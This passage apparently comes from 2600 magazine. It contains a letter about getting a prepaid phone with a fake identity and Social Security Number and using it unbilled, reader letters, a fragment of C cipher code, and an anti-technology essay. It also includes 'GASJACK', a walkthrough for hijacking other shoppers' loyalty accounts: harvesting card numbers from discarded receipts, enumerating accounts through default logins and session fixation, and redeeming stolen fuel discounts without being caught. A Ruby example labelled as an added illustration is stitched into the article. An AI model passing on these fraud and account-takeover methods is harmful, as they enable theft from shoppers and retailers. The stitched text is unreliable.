Last year I decided that a regular cell phone service plan wasn't for me anymore. I went to Radio Schlock and bought a Cingular phone and a prepaid card with cash. Because I could, I provided all bogus info for this phone (name, home address, home phone, and Social Security Number). I declined the request for a photo ID and I walked out with a working phone.
After a few weeks I realized that certain people couldn't call me. From most telephones there was no problem but many phones from inside and outside the Cingular network would get a "this number is disconnected" message. I knew that something in Cingular's routing was messed up, probably from someone previously having this number and then it being disconnected. I called tech support.
After four hours on the phone over three days (not including hold time), Cingular attempted various high-tech fixes to my problem. The tech would bang on their keyboard and then say, "Have your friend try to call you now. Did it work? No? OK. Hold on." Repeat ad nauseam. It was clear they really didn't know what they were doing even as my call was escalated higher and higher.
Finally the rep at the "highest" level of escalation told me, "I'm going to try one more thing and if it doesn't work, we'll have to issue you a new SIM card and new phone number." This was a bogus alternative. Why not fix the problem instead of waiting for this number to be reassigned to someone new where the problem could repeat itself? Anyway, against all odds, Cingular's "last chance" fix worked. "Great!" I thought. Problem solved. In fact, as I would discover a few hours later, it was "super-solved."
When using a prepaid plan the cell phone receives a text message after each call with the cost of the previous call and the current balance. The messages are a little annoying but, like everything else, eventually you learn to ignore them. It took me a whole afternoon of calls to realize I wasn't getting these messages anymore. Curious, I pinged the network with #777 to request my account balance. Then I made a few calls to some friends at their land line. I pinged the network again and the balance was the same. Hurrah!
In their desperate and haphazard effort to fix my phone they disconnected it from their billing system! My prepaid phone was now a free phone! Also, Cingular had no idea who I was. The worst they could do was deactivate my phone. They had no one to send a bill to. Needless to say, I felt more than compensated for my hours on hold.
I enjoyed this perk for nine months before the phone turned on one morning to show "SIM card registration failed." I called tech support again and after several escalations and "it shouldn't do this" quotes from the reps, my phone was reactivated, albeit with a $0.01 balance. I'm paying for phone service again but I will fondly remember my months with a free phone.
This was an interesting experience and it shows that proper phone operation is a separate entity from billing. You can have one without the other. I hope this is interesting to people who are curious about how the phone service works.
ZaphO(
C
B

Dear 2600:
Thought you might appreciate the fact that not only is 2600 not hidden at the back of the shelf in the Charlottesville, Virginia Barnes and Noble, but it's also front and center, eye level, and a "featured title."
ben
There are many such stores all over the place where we're proudly displayed. We tend to hear more about the exceptions so it's important to acknowledge when stores do a good job as most of them do.

Provocation

Dear 2600:
I had just purchased your magazine from a very attractive female type unit while talking on the phone about a comic con. I was putting it into my inside jacket pocket when I too was assaulted by your wonderfully smelling pages. This resulted in me sucking my thumb. I think my chances of hitting it off with her are now less than zero. I thought there were gonna be warnings about this sort of thing. At any rate keep up the great work. Love the smell of a fresh baked issue.
Tapi

Dear 2600:
So I was at the #2600 IRC channel chatting about the Microsoft and Novell partnership asking people what they thought about this. Anyhow, to make a long story short I was spelling Microsoft like this: micro$oft. I got kicked from the channel for using bad language (three times resulted in a ban). So my question is, when did micro$oft become a bad word on the #2600 channel?
ghOstbOt
We are in no way responsible for any such random actions that occur in our IRC channel. We suspect you were the victim of someone's opinion/joke, not to mention your failure to realize that repeatedly doing the same thing would get you banned. We encourage readers to check out the #2600 channel (and other regional 2600 channels) on the irc.2600.net network. Just remember that we don't control the intelligence level. While people from the magazine try to come onto the channel from time to time, it's mostly a wide open space where users from all levels of the human evolutionary scale congregate. Keep this in mind and you won't get overly frustrated.

Appreciation

Dear 2600:
First, I need to thank you. I have thoroughly enjoyed your magazine for a few years now. I've learned a ton and it's been very useful in conveying the mentality that so many of us share to the outside world. Many times I've answered questions by simply presenting your magazine to the curiosity seekers.
Second, I was 17 when the FBI first raided my home. I was 19 the second time around. I was 21 when I was sentenced in 2005 to 17.5 years in federal prison. And because of my charges and what I had admitted to doing and what I was told to expect, that sentence was quite a shock. No, not pedophilia or even sex-related. Not drug-related. A minor role in a credit card fraud scheme. The judge apparently was none too happy with me, giving me the statutory maximum.
I would love to write an article for you describing what exactly it's like to go from bad to worse to worst. A report from the front lines, if you will. My hope is that in the "unlikely" event that any 2600 readers are ever charged by the feds, they won't receive five to six times the sentence they expect, as did I. I would most like to spread the word about how dirty feds can, and will, play. And a few points to watch out for.
Let me know if you might like me to write you a little article. And thanks again guys.
Jason c.
By all means write the article. Your story serves as a reminder to those who may not yet know it that the prosecution will do anything - including lying to you - in order to secure a conviction. Putting people away is their business. While there are many overly expensive, incompetent, and dishonest lawyers out there, you are still far better off getting one rather than trying to work things out with the authorities on your own. We've heard so many horror stories of people getting screwed at sentencing and with today's prosecutorial climate, it's bound to get even worse. And, needless to say this sort of thing does nothing for rehabilitation.

Continued from page 19

      lrnd = ltable(lrnd);                      /* get the next lookup table value */
      ilen = (U)(lrnd / 832 + 256);             /* buffer bitlen: 256<=ilen<=1516 */
      if (ibit + ilen > ibuf * 8) {             /* curr. bit-pointer+ilen spans cbuf */
        if (ieof) {                             /* EOF flag is ON */
          ilen = ibuf * 8 - ibit;               /* reset bit-length of buffer segment */
        }
        else {                                  /* EOF flag is OFF; adjust file pointer */
          ifn_write(cbuf, lbyt, ibuf, ebuf);    /* write data to the file */
          lbyt -= (ibuf - ibit / 8);            /* set lbyt to load from ibit */
          ibit %= 8;                            /* set ibit to first byte of <new> cbuf */
          break;                                /* exit loop to reload cbuf from lbyt */
        }
      }
                                                /* encrypt or decrypt the current segment [below] */
      for (indx = 0; indx < ilen; indx++) {     /* loop through array elements */
        int1[indx] = indx;                      /* bit offsets from current ibit offset */
        lrnd = ltable(lrnd);                    /* get the next lookup table value */
        int2[indx] = lrnd;                      /* lookup values for sort function */
      }
      ifn_sort(int1, int2, istk, ilen - 1);     /* sort lookup array */
      memcpy(ctmp, cbuf, 2048);                 /* copy data buffer to dest. buffer */
      if (iopr) {                               /* this is the encrypt operation */
        for (indx = 0; indx < ilen; indx++) {   /* loop through bit group */
          bitput(ctmp, indx + ibit, bitget(cbuf, int1[indx] + ibit));
        }                                       /* move bits to "random" positions [above] */
      }
      else {                                    /* this is the decrypt operation */
        for (indx = 0; indx < ilen; indx++) {   /* loop through bit group */
          bitput(ctmp, int1[indx] + ibit, bitget(cbuf, indx + ibit));
        }                                       /* restore bits from "random" positions [above] */
      }
      memcpy(cbuf, ctmp, 2048);                 /* copy dest. buffer to data buffer */
      ibit += ilen;                             /* increment ibit to next bit-segment */
      if (ibit == ibuf * 8) {                   /* loop until ibit == length of cbuf */
        ifn_write(cbuf, lbyt, ibuf, ebuf);      /* put current buffer to file */
        ibit = 0;                               /* set ibit to first byte of <new> cbuf */
        break;                                  /* ibit == length of cbuf; exit loop */
      }
  free(cbuf);                                   /* deallocate the file buffer */
  free(ctmp);                                   /* deallocate the temp buffer */
  free(int1);                                   /* deallocate the sort index array */
  free(int2);                                   /* deallocate the sort lookup array */
  free(istk);                                   /* deallocate the sort stack array */
I bitget(C *cstr1, I ibit) {                   /* get a bit-value from a string */
  I ival;                                      /* initialize the bit value */
  switch (ibit % 8) {                          /* switch on bit# within character */
    case 0:                                    /* bit #0 in target character */
      ival = 1;                                /* value of bit #0 */
      break;
    case 1:                                    /* bit #1 in target character */
      ival = 2;                                /* value of bit #1 */
      break;
    case 2:                                    /* bit #2 in target character */
      ival = 4;                                /* value of bit #2 */
      break;
    case 3:                                    /* bit #3 in target character */
      ival = 8;                                /* value of bit #3 */
      break;
    case 4:                                    /* bit #4 in target character */
      ival = 16;                               /* value of bit #4 */
      break;
    case 5:                                    /* bit #5 in target character */
      ival = 32;                               /* value of bit #5 */
      break;
    case 6:                                    /* bit #6 in target character */
      ival = 64;                               /* value of bit #6 */
      break;
    case 7:                                    /* bit #7 in target character */
      ival = 128;                              /* value of bit #7 */
      break;
    default:
      break;
  }
  return ((cstr1[ibit / 8] & ival) != 0);      /* return the value of the target bit [above] */
}

V bitput(C *cstr1, I ibit, I iput) {           /* put a bit-value to a string */
  I ival;                                      /* initialize the bit value */
  I ipos = ibit / 8;                           /* position of 8-bit char. in cstr1 */
  switch (ibit % 8) {                          /* switch on bit# within character */
    case 0:                                    /* bit #0 in target character */
      ival = 1;                                /* value of bit #0 */
      break;
    case 1:                                    /* bit #1 in target character */
      ival = 2;                                /* value of bit #1 */
      break;
    case 2:                                    /* bit #2 in target character */
      ival = 4;                                /* value of bit #2 */
      break;
    case 3:                                    /* bit #3 in target character */
      ival = 8;                                /* value of bit #3 */
      break;
    case 4:                                    /* bit #4 in target character */
      ival = 16;                               /* value of bit #4 */
      break;
    case 5:                                    /* bit #5 in target character */
      ival = 32;                               /* value of bit #5 */
      break;
    case 6:                                    /* bit #6 in target character */
      ival = 64;                               /* value of bit #6 */
      break;
    case 7:                                    /* bit #7 in target character */
      ival = 128;                              /* value of bit #7 */
      break;
    default:
      break;
  }
  if (iput) {                                  /* OK to set the bit ON */
    if (!(cstr1[ipos] & ival)) {               /* bit is NOT already ON */
      cstr1[ipos] += ival;                     /* set bit ON by adding ival */
    }
  }
  else {                                       /* OK to set the bit OFF */
    if (cstr1[ipos] & ival) {                  /* bit is NOT already OFF */
      cstr1[ipos] -= ival;                     /* set bit OFF by subt. ival */
    }
  }
}

V ifn_sort(I *int1, L *lnt2, I *istk, I imax) { /* array Quicksort function */
  I iex1;                                      /* initialize the outer-loop exit flag */
  I iex2;                                      /* initialize the inner-loop exit flag */
  I ilap;                                      /* initialize the low array pointer */
  I ilsp;                                      /* initialize the low stack pointer */
  I irdx = 0;                                  /* initialize the sort radix */
  I itap;                                      /* initialize the top array pointer */
  I itsp;                                      /* initialize the top stack pointer */
  I iva1;                                      /* initialize array value from low stack pointer */
  L lva2;                                      /* initialize array value from low stack pointer */
  istk[0] = 0;                                 /* initialize the low array pointer */
  istk[1] = imax;                              /* initialize the top array pointer */
  while (irdx >= 0) {                          /* loop until sort radix < 0 */
    ilsp = istk[irdx + irdx];                  /* set the low stack pointer */
    itsp = istk[irdx + irdx + 1];              /* set the top stack pointer */
    irdx--;                                    /* decrement the sort radix */
    iva1 = int1[ilsp];                         /* get array value from low stack pointer */
    lva2 = lnt2[ilsp];                         /* get array value from low stack pointer */
    ilap = ilsp;                               /* set the low array pointer */
    itap = itsp + 1;                           /* set the top array pointer */
    iex1 = 0;                                  /* initialize the outer-loop exit flag */
    while (!iex1) {                            /* loop to sort within the radix limit */
      itap--;                                  /* decrement the top array pointer */
      if (itap == ilap) {                      /* top array pointer==low array pointer */
        iex1 = 1;                              /* set the outer-loop exit flag ON */
      }
      else if (lva2 > lnt2[itap]) {            /* value @ low ptr > value @ top ptr */
        int1[ilap] = int1[itap];               /* swap low and top array values */
        lnt2[ilap] = lnt2[itap];               /* swap low and top array values */
        iex2 = 0;                              /* initialize the inner-loop exit flag */
        while (!iex2) {                        /* loop to compare and swap array values */
          ilap++;                              /* increment the low array pointer */
          if (itap == ilap) {                  /* top array pointer==low array pointer */
            iex1 = 1;                          /* set the outer-loop exit flag ON */
            iex2 = 1;                          /* set the inner-loop exit flag ON */
          }
          else if (lva2 < lnt2[ilap]) {        /* value@ low ptr<value@ low ptr */
            int1[itap] = int1[ilap];           /* swap top and low array values */
            lnt2[itap] = lnt2[ilap];           /* swap top and low array values */
            iex2 = 1;                          /* set the inner-loop exit flag ON */
          }
        }
      }
    }
    int1[ilap] = iva1;                         /* put array value from low stack pointer */
    lnt2[ilap] = lva2;                         /* put array value from low stack pointer */
    if (itsp - ilap > 1) {                     /* low segment-width is > 1 */
      irdx++;                                  /* increment the sort radix */
      istk[irdx + irdx] = ilap + 1;            /* reset low array pointer */
      istk[irdx + irdx + 1] = itsp;            /* reset top array pointer */
    }
    if (itap - ilsp > 1) {                     /* top segment-width is > 1 */
      irdx++;                                  /* increment the sort radix */
      istk[irdx + irdx] = ilsp;                /* reset low array pointer */
      istk[irdx + irdx + 1] = itap - 1;        /* reset top array pointer */
    }
  }
}

V ifn_msgs(C *cmsg, I iofs, I irow, I icol, I ibrp, I iext) { /* display msgs */
  if (iofs >= 0) {                             /* OK to clear screen */
    io_vcls(7);                                /* clear the screen */
  }
  io_vdsp(cmsg, 4, abs(iofs), 7);              /* display the user message */
  if (ibrp) {                                  /* OK to sound user-alert (beep) */
    printf("\a");                              /* sound the user-alert */
  }
  if (iext) {                                  /* OK to exit the program */
    io_vcsr(5, 0, 0);                          /* relocate the cursor */
    fcloseall();                               /* close all open files */
    exit(0);                                   /* return to DOS */
  }
  else {                                       /* do NOT exit the program */
    io_vcsr(irow, icol, 0);                    /* 'hide' the cursor */
  }
}

L ltable(L lrnd) {                             /* get next lookup table no. */
  L l1;                                        /* initialize temp value #1 */
  L l2;                                        /* initialize temp value #2 */
  L l3;                                        /* initialize temp value #3 */
  L l4;                                        /* initialize temp value #4 */
  l1 = lrnd % 8;                               /* These 5 lines are an integer-only */
  l2 = (lrnd - l1) % 16;                       /* equivalent to the floating-point */
  l3 = (lrnd - l1 - l2) % 64;                  /* operations formerly used in this, */
  l4 = (lrnd - l1 - l2 - l3);                  /* the 16-bit DOS version of the code */
  return (l1 * 214013 + l2 * 82941 + l3 * 17405 + l4 * 1021 + 2531011) % 1048576;
}

V ifn_read(C *cbuf, L lbyt, U ibuf, FILE *ebuf) {  /* read from binary file */
  fseek(ebuf, lbyt, SEEK_SET);                 /* set the buffer-read pointer */
  fread((V *)cbuf, 1, ibuf, ebuf);             /* read data from the binary file */
}

V ifn_write(C *cbuf, L lbyt, U ibuf, FILE *ebuf) { /* write to binary file */
  fseek(ebuf, lbyt, SEEK_SET);                 /* set the buffer-write pointer */
  fwrite((V *)cbuf, 1, ibuf, ebuf);            /* write data to the binary file */
}

U io_vadr(I inop) {                            /* get video address (color or b/w) */
  rg.h.ah = 15;                                /* video-address function */
  int86(0x10, &rg, &rg);                       /* call DOS for video address */
  if (rg.h.al == 7) {                          /* register A-low is 7 */
    return (0xb000);                           /* return b/w address */
  }
  else {                                       /* register A-low is NOT 7 */
    return (0xb800);                           /* return color address */
  }
}

V io_vcls(I iclr) {                            /* clear screen function */
  I irow;                                      /* initialize the row number variable */
  C cdat[81];                                  /* initialize the row data buffer */
  memset(cdat, ' ', 80);                       /* clear the row data buffer */
  cdat[80] = '\0';                             /* terminate the row data buffer */
  for (irow = 0; irow < 25; irow++) {          /* loop thru the screen rows */
    io_vdsp(cdat, irow, 0, iclr);              /* display each <blank> screen row */
  }
}

V io_vcsr(I irow, I icol, I icsr) {            /* set cursor position [and size] */
  rg.h.ah = 2;                                 /* cursor-position function */
  rg.h.bh = 0;                                 /* video page zero */
  rg.h.dh = (C)irow;                           /* row number */
  rg.h.dl = (C)icol;                           /* column number */
  int86(0x10, &rg, &rg);                       /* call DOS to position cursor */
  if (icsr) {                                  /* cursor-size specified */
    rg.h.ah = 1;                               /* cursor-size function */
    rg.h.ch = (C)(13 - icsr);                  /* set cursor-begin line */
    rg.h.cl = 12;                              /* set cursor-end line */
    int86(0x10, &rg, &rg);                     /* call DOS to set cursor size */
  }
}

V io_vdsp(C *cdat, I irow, I icol, I iclr) {   /* display data on screen */
  I ilen = strlen(cdat);                       /* length of string to be displayed */
  I iptr;                                      /* byte-counter for displayed string */
  U uclr = iclr * 256;                         /* unsigned attribute high-byte value */
  if (!uvadr) {                                /* video pointer segment not set */
    FP_SEG(uvadr) = io_vadr(0);                /* set video pointer segment */
  }
  FP_OFF(uvadr) = irow * 160 + icol * 2;       /* set video pointer offset */
  for (iptr = 0; iptr < ilen; iptr++) {        /* loop thru displayed string */
    *uvadr = uclr + (UC)cdat[iptr];            /* put data to video memory */
    uvadr++;                                   /* increment video display pointer */
  }
}

isn't such a good thing. Perhaps we've reached a point where the desire to incorporate it into every aspect of our lives has begun to take precedence over the goal of what it is we're trying to replace. It's not like there's been any lack of concern over the matter, especially lately. Search any news aggregating service for the terms +voting +machine +fraud and you'll see what I'm talking about. What about +passport +cracked or "red light" +camera? I'm not referring to dried-out passports whose covers have succumbed to old age, or the little LED that indicates your latest burglary attempts have been captured on two slowly rotating reels of magnetic tape (although these are surely problems to some). I'm talking about the excessive use of technology. Five years ago there was no such thing as intercepting the communications between an immigration control computer and your passport, and ten years ago you weren't likely to get an automated ticket in the mail because you entered an intersection behind that Big-Ass SUV which entirely blocked your view of the traffic light as it changed from green to red. And it's not like this stuff is helping anything.

The RFID "feature" of a passport is, as far as I'm concerned, entirely useless. It creates an unnecessary security risk and contributes nothing to the speed at which immigration lines progress. The current system uses MICR (magnetic ink character recognition) as the agent swipes the bottom portion of your passport. It's fast, relatively reliable, perfectly suitable for the application, and it's even secure (so long as the passport remains in your possession). But we're rapidly progressing to the point where anyone can sneak up behind you with a specially designed RFID reader stuffed in their crotch, brush up against your tuckus, and suck the digital fingerprints and photographs of you out of your ass-pocket. No shit. And every time this stuff is demonstrated, officials shrug it off as overly paranoid. They don't understand the technology, yet are responsible for making all of the decisions regarding its use.

What about the red light cameras? Surely some entity besides the capitalizing municipality and associated police officers (who have dutifully acquired extended donut breaks as a result of the reduced workload) stands to benefit from them. They've got to be making our streets safer, since that's the only official reason generally given for their existence. But even this is disputed, as the Washington Post has discovered upon investigation of red light cameras installed in D.C. In fact, accidents have more than doubled in some locations and there are even lawsuits claiming that municipalities have changed light timings to increase violations! What is clear is that accidents are increasing in many locations (and that there's about $100 missing from my checking account). A simple solution comes to mind: remove the damn cameras and just delay the perpendicular green light by a few seconds. The T-bone crashes that they're looking to prevent would surely be reduced without the added side-effect of increased rear-end collisions. It's unfortunate that such a choice between safety and income never leans in our favor.

The grandmaster of all failing technological implementations these days seems to be the voting machine. Ah, the voting machine. Few of us can even remember when the activities of voting and using a machine were two entirely separate processes. Voting used to entail marking your favorite candidates onto a sheet of paper to have it later counted by the King's Men, who could not be trusted. Now the vote counters have been replaced with elaborate mechanical and electrical contraptions, which cannot be trusted. Corrupt poll workers, loose gears, broken levers, and even hanging chads were no match for the commotion stirred up by the poor design of the modern electronic voting machine. The documentary Hacking Democracy conveys this very well; you've got to watch it. Not only does it demonstrate how access to the most widely-handled component of these machines can be used to skew elections, but it even sheds some doubt as to whether or not the public willingly elected some of the lesser evolved members of our species into some of the most critical positions in our social hierarchy. Not that I'm a conspiracy theorist or anything....

Not everybody is so eager to replace everything with the latest and greatest gadgets, however. Take pilots, for instance. When planning flights, many pilots use an E6B (or similar) flight computer. It's a computer in the most rudimentary sense of the term, essentially a special-purpose slide rule. In fact, it's the only field in which slide rules are still in widespread use. Why? Because they're fast, reliable, and when you're thousands of feet above the ground flying an aircraft you don't care to be fumbling with an electronic calculator: replacing dead batteries, trying to work around that stuck key, or wondering whether or not the LCD would still be intact after sitting on it, if only you'd started that diet a few months earlier. There are other added benefits, too. The concepts of significant digits and keeping track of exponents are generally lost amongst today's TI-89-touting youth. Slide rules require that you consider these things, often allowing you to catch mistakes long before you would while using a calculator.

Look, I'm not anti-technology. Really. I practically immerse my entire life in it. It just seems obvious that some things aren't quite ready for prime time yet, and premature deployment may actually have the potential for some devastating consequences. The examples I used here are simply those that have either received a bunch of press coverage or that I have personal experience with. I threw in the slide rule rant for good measure (no pun intended), but the concepts they demonstrate are well-suited to the notion that there are some scenarios where old technology just works better. There are plenty more I could have chosen along the same lines, some with more severe ramifications and some which are much more trivial. Either way, it usually seems to be the younger generation who are just as closed-minded to using more traditional technology as your grandmother is toward the advent of e-mail. Whether it's ending up with a corrupt democracy, rampant identity theft, higher accident rates, or a broken calculator when you need that quick altitude-correction calculation, we definitely need to take a good hard look at the benefits and drawbacks of making the switch to the latest-and-greatest.

If you missed out on our latest conference (or if you were there and somehow managed to miss one of the more than 70 talks given), may we suggest getting ahold of our HOPE Number Six DVDs?

There's no way we can list them all here but if you go to http://store.2600.com/hopenumbersix.html you'll get a sense of what we're talking about.

We still have leftover shirts too. For 20 you get a HOPE shirt, a conference badge, a conference program, and a HOPE sticker. Overseas add 5 for shipping.

2600
PO Box 752
Middle Island, NY 11953 USA

GASJACK - HIJACKING FREE GASOLINE

by cipz
cipz@lv2600.com

Giant is a food store chain and some stores have gas stations. It actually has a long and complicated history, none of which pertains to this hack. Like many large food stores, they have a program which offers their shoppers rewards for using their BonusCard at every purchase. Shoppers accumulate points which are traded in for discounts. All the caveats of having your personal shopping habits tracked apply but have nothing to do with this article.

There are several different types of points a shopper can collect. The ExtraRewards points allow shoppers to get up to a 15 percent discount on their next shopping bill. It is the new GasRewards points that has piqued my curiosity. For every one hundred dollars a shopper spends, they receive a discount of ten cents off a gallon at the gas pump. According to Giant's own policy for this promotion, gas can be obtained for free if enough points are earned. The policy however dictates that the points can only be redeemed once and the discount only applies up to 30 gallons. This means you get one fill of your gas tank at the earned discount. It has not been confirmed, but a friend mentioned having a vehicle which holds about 32 gallons of gas that was filled at the discounted price. It appears the 30 gallon limit might not be enforced. There also does not exist any policies on gas cans. A scenario: John accumulates 500 gas points and decides to cash in his points because the deadline for the promotion is fast approaching. He proceeds to the gas pump, swipes his BonusCard under the bar code reader and, voila, gas now flows at a rate of 50 cents less a gallon. His tank holds 30 gallons and he manages to save himself 15 dollars.

First Mistake

The Giant BonusCard is nothing more than a piece of plastic with a UPCA barcode. The Giant BonusCard number (BCN) is 11 digits while the 12th digit, a checksum, is omitted. The BCN is printed at the top of every receipt. That was Giant's first mistake. A simple solution is to adopt the practice of credit card receipt printers: only print the last four digits of a card. Unfortunately, there are more mistakes and holes which make instituting this single change ineffective at stopping account hijacking.

Game Over

This article would be over if the goal was as simple as obtaining gas for free. A person of questionable ethical fortitude could easily find Giant receipts in the garbage and then proceed to one of many online references to have the BCN converted to a printable barcode. Then just swipe the barcode at the gas pump and drive off with discounted gas. But if one objects to putting their hands in places of questionable sanitary fortitude, there exists another method. Randomly generating bar codes and then using the in store scanners to see if the accounts exist and how many gas points are on them is one idea. Again, this article would be over quickly leaving the reader the daunting task of trying to figure out which numbers were valid and which accounts had enough points to make a trip to the pump worth the effort.

Internet to the Rescue

Whenever I have to do something that is boring and repetitious, the first thing I think of is how I can get a computer to do it for me. Even if the original task were to take only 10 minutes, I would gladly spend an hour writing a program to make the computer do it for me in 10 seconds because, some day, I might have to repeat the task. I hear some blah blah blah about efficiency, but to me programming is fun! The goal now was to find a website which allowed shoppers to check the balance of their Giant BonusCards. I located several websites which all appear to be official Giant websites.

Trying to Save Time by Wasting 15 Minutes

One of particular interest was the site www.giant-food.com/bonuscard/. At first glance I was surprised to see that the first three letters of the shopper's last name were required and even more surprised that this system was requiring 12 digits instead of 11 to log in. I headed over to the U.S. Census Bureau and downloaded a file which listed the most common surnames in the United States and the number of people per surname. Using a simple script to chop the first three characters off, add up the population numbers, and re-sort the list, I compiled my own new list. The original list contained over 16,000 entries. The new list contained less than 3000 entries. Using pure brute forcing, guessing a three character word has 17,576 (26^3) possibilities. Rather than throw my new list at the site and allow it to brute force the last name, I decided to try and log in using a
valid set of credentials. After several attempts with valid information I concluded the log in function of this site was not working. I just wasted 15 minutes, but oh well, I got a dictionary of common surnames in the U.S. I am sure that might come in handy one day. And in case anyone was wondering, yes, Smith was the most common.

I'm In!

www.giantpa.com was another site which looked promising. Unfortunately it asked for a username (email), password, and BCN to log in. I entered a known valid BCN and spoofed the rest of the information. I ran Ethereal (packet sniffer) and Achilles (proxy) and logged the data because I was sure it would be useful later on. My jaw dropped as I was taken to a page which listed the first name and the savings so far this year of the BCN owner. I noticed a link to check on the various promotion points and followed it. True to the link's promise, I was presented with the amount of points of the several promotions which the BCN owner was eligible for. Among them was the amount of GasRewards points. Two more huge mistakes on Giant's part were allowing default logins and submitting data in plain text.

More Than Just Free Gas

Again, this article would end here for anyone wishing to hijack free gasoline. A person with adequate programming capabilities and dubious intentions could write a program to simply step through BCNs and log the amount of points each one has at the time. Then it is just a matter of printing off the barcode and heading out to the gas station. As I was writing a program to test this theory, I noticed there were some differences between the information presented when I logged in. Some BCNs would first ask for me to select a preferred store but would always come back with a generic first name, like John, Betty, Pat, Mary, etc. and would always have $0.00 savings this year. I assumed these BCNs to be invalid or not ever registered. Another response I was getting was a failed login attempt. I chose not to investigate this any further. The most interesting response I received was the rare ability to click a link which read "Update Account." Following this link presented me with a wealth of information. The information gathered from this new link included a password (keep in mind, the password to get this far was originally dummy information). The password was in a form which made it appear as masked characters, but viewing the source or the Ethereal logs showed the password coming across the wire in plain text. Huge Mistake Number ... a lot... Never send users their passwords, ever. Instead, make them confirm the old password first if they want to change it, or implement a password reset policy which emails the user their password. Analyzing the html of the different responses also kicked up a hidden piece of information: the preferred store number of the owner of the BCN. Using the Store Locator page, one easily matches store numbers to store addresses. I believe the creators of the BonusCard program were thinking "Who would ever want to hack this?" which led to the complete lack of security I have seen. Anyone designing any online system should build in security from day one, especially if you collect even a single piece of information from your users. umount /dev/soapbox

The Gory Details

Please keep in mind, I am by no means an expert on http or programming. I taught myself what I needed to know in order to get the programs to work. When one visits the website, a JSESSIONID is created in a cookie. Then the login credentials along with the JSESSIONID are sent to the server using a POST method. The server then establishes a session using the JSESSIONID. This JSESSIONID is not checked against the IP address of the client and can be arbitrarily specified by the client. To make things easier during development, I simply used the BCN as the JSESSIONID. The server then sends back a 302 Moved Temporarily message. The location field in this message is a full URL which contains more tokens and the previously mentioned JSESSIONID. This link can be followed by anyone, which opens up the possibility of session hijacking. This 302 location is retrieved using a GET request and must be followed in order to initialize the session. If an attempt is made to request the points page after sending the POST data, the server will respond with an error stating the storenum variable has not been defined. Requests for the pages containing the points information are made using GET /shareddev/subclub/. All the points the customer has for the reward clubs the BCN is eligible for are displayed.

The Code

The code is written in Ruby because I wanted to learn more about Ruby. It is easily portable to Perl, but I will leave that as an exercise to the reader. The betweenstrings() function could probably be simplified using regex, but this function has served me well in the past and I am still learning regex. No error checking was built in to this code as it was designed to be a proof of concept. The POST and GET strings have been stripped to a minimum so no browser cloaking is done. If you put a for loop around this code and giantpa.com's thugs kick in your door, do not come crying to me. It only works for an account which is eligible for Gas Reward points and will return an error if the store locator or failed login situations occur. Code is not needed for this hack, but it does help explain the underlying system, expose its vulnerabilities, and simplify the overall demonstration.

The Risks

I identified several risks throughout working on this project. First, dumpster diving has all of its risks of being caught associated with it. This may not be a risk, but more of an ethical choice to make. Following through on this method essentially steals the points earned by someone else. During the initial course of probing the website, I caused errors to be generated. These errors reported my IP address. Tagging the
server with several thousand requests to login may disturb the sleeping IT security guard. After printing off a bar code to try, there are risks associated with actual procurement of the free gas. These gas stations typically have a booth where a person sits to collect cash. Most of the time I see this person reading a book and suspect exiting the booth is not permitted. Almost any gas station will employ the use of security cameras, but again, this risk is minimized by the response time to the incident. Retention time of the video is likely to be short while the chain of events leading to request to view the videos will take longer. First, the shopper whose BCN was hijacked must complain when they notice the problem. This may be shortly after paying for the gas at full price. It is very difficult to motivate a company which has already been paid. So the shopper complains to the attendant. The attendant hails a shift manager. The shift manager is perplexed and hails a store manager. At this point, the complaining customer will have probably been appeased. Assuming an isolated incident, it is likely the investigation will stop here. Otherwise, it is probably up to the store manager to make the connection that accounts are being hijacked. I am pretty sure that getting caught is legally binding (all sorts of puns intended on that one).
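
The session handling described under "The Gory Details" (a server that adopts whatever JSESSIONID the client sends and keeps it across login) is a session fixation flaw. As an added example, not code from the article or from the site it describes, the Ruby sketch below puts a store with that behaviour beside one that only honours IDs it issued and rotates the ID at login; the class names, the 128-bit ID size and the placeholder card number are assumptions made for the illustration.

```ruby
require 'securerandom'

# Mirrors the behaviour the article describes: whatever session ID arrives in
# the client's cookie is adopted, and it stays the same after login.
class AdoptingSessionStore
  def initialize
    @sessions = {}
  end

  # Returns the session ID in effect for this client.
  def begin_session(client_supplied_id)
    id = client_supplied_id.to_s.empty? ? SecureRandom.hex(16) : client_supplied_id
    @sessions[id] ||= { card: nil }
    id
  end

  # Marks the session as logged in and returns the ID to use from now on.
  def login(session_id, card)
    @sessions.fetch(session_id)[:card] = card
    session_id
  end

  def card_for(session_id)
    session = @sessions[session_id]
    session && session[:card]
  end
end

# Hardened variant: only IDs this server issued are honoured, IDs come from a
# CSPRNG, and the pre-login ID is retired the moment the login succeeds.
class HardenedSessionStore
  def initialize
    @sessions = {}
  end

  def begin_session(client_supplied_id)
    return client_supplied_id if @sessions.key?(client_supplied_id)
    issue({ card: nil })
  end

  def login(session_id, card)
    raise ArgumentError, 'unknown session' unless @sessions.key?(session_id)
    @sessions.delete(session_id)
    issue({ card: card })
  end

  def card_for(session_id)
    session = @sessions[session_id]
    session && session[:card]
  end

  private

  def issue(data)
    id = SecureRandom.hex(16) # 128 random bits, unrelated to any account data
    @sessions[id] = data
    id
  end
end

# Plays out the fixation scenario against a store: an ID picked outside the
# server (planted_id) is presented before login, then the card holder logs in.
def fixation_outcome(store, planted_id, card)
  id_before_login = store.begin_session(planted_id)
  id_after_login = store.login(id_before_login, card)
  {
    planted_id_authenticated: !store.card_for(planted_id).nil?,
    id_rotated_at_login: id_after_login != id_before_login,
    new_id_authenticated: store.card_for(id_after_login) == card
  }
end

if __FILE__ == $PROGRAM_NAME
  card = '00000000000' # constructed 11-digit placeholder, not a real card number
  # The article used the card number itself as the session ID, so the planted
  # ID here is the same string as the card number.
  [AdoptingSessionStore, HardenedSessionStore].each do |klass|
    puts "#{klass}: #{fixation_outcome(klass.new, card, card)}"
  end
end
```

With the hardened store, knowing or choosing a session ID in advance gains nothing: the planted value is never adopted, and the only authenticated ID is one minted by the server after the login succeeded.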
Does It Work?
After identifying a lot of the risks, I decided to test the method using my own BCN. I simply ran my BCN through my program, determined the amount of discount, printed the bar code, and headed out to the gas station. I was rewarded with the discount I was entitled to while retaining the ability to sleep peacefully at night.
Further Investigations
